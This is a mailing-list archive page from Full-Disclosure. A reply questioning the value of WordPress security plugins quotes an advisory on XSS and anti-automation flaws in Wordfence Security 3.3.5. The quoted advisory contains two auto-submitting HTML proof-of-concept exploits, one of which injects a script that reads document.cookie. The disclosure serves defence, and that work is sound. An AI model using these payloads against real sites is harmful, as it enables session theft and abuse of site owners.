[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] XSS and IAA vulnerabilities in Wordfence Security for WordPress

To: "<full-disclosure@xxxxxxxxxxxxxxxxx>" <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: Re: [Full-disclosure] XSS and IAA vulnerabilities in Wordfence Security for WordPress
From: Philip Whitehouse <philip@xxxxxxxxx>
Date: Fri, 19 Oct 2012 18:37:13 +0100

Hmm,

Another 'security' plugin with vulnerabilities...

What exactly is the point of them? Even in an ideal world surely WP should be 
secure anyway - doesn't it just increase the attack surface?

Philip Whitehouse

On 19 Oct 2012, at 18:16, "MustLive" <mustlive@xxxxxxxxxxxxxxxxxx> wrote:

> Hello list!
> 
> I want to warn you about Cross-Site Scripting and Insufficient 
> Anti-automation vulnerabilities in Wordfence Security for WordPress.
> 
> Wordfence - it's security plugin for WordPress.
> 
> -------------------------
> Affected products:
> -------------------------
> 
> Vulnerable are Wordfence Security 3.3.5 and previous versions.
> 
> ----------
> Details:
> ----------
> 
> XSS (WASC-08):
> 
> Wordfence Security XSS.html
> 
> <html>
> <head>
> <title>Wordfence Security XSS exploit (C) 2012 MustLive. 
> http://websecurity.com.ua</title>
> </head>
> <body onLoad="document.hack.submit()">
> <form name="hack" action="http://site/?_wfsf=unlockEmail"; method="post">
> <input type="hidden" name="email" 
> value="<script>alert(document.cookie)</script>">
> </form>
> </body>
> </html>
> 
> Insufficient Anti-automation (WASC-21):
> 
> Wordfence Security IAA.html
> 
> <html>
> <head>
> <title>Wordfence Security IAA exploit (C) 2012 MustLive. 
> http://websecurity.com.ua</title>
> </head>
> <body onLoad="document.hack.submit()">
> <form name="hack" action="http://site/?_wfsf=unlockEmail"; method="post">
> <input type="hidden" name="email" value="admin@xxxxxxxxxx">
> </form>
> </body>
> </html>
> 
> I've informed the plugin developer about vulnerabilities. And mentioned 
> about these vulnerabilities at my site (http://websecurity.com.ua/6106/).
> 
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua 
> 
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] XSS and IAA vulnerabilities in Wordfence Security for WordPress
  - From: Troy Rose

References:
- [Full-disclosure] XSS and IAA vulnerabilities in Wordfence Security for WordPress
  - From: MustLive

Prev by Date: Re: [Full-disclosure] vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities
Next by Date: Re: [Full-disclosure] XSS and IAA vulnerabilities in Wordfence Security for WordPress
Previous by thread: [Full-disclosure] XSS and IAA vulnerabilities in Wordfence Security for WordPress
Next by thread: Re: [Full-disclosure] XSS and IAA vulnerabilities in Wordfence Security for WordPress
Index(es):
- Date
- Thread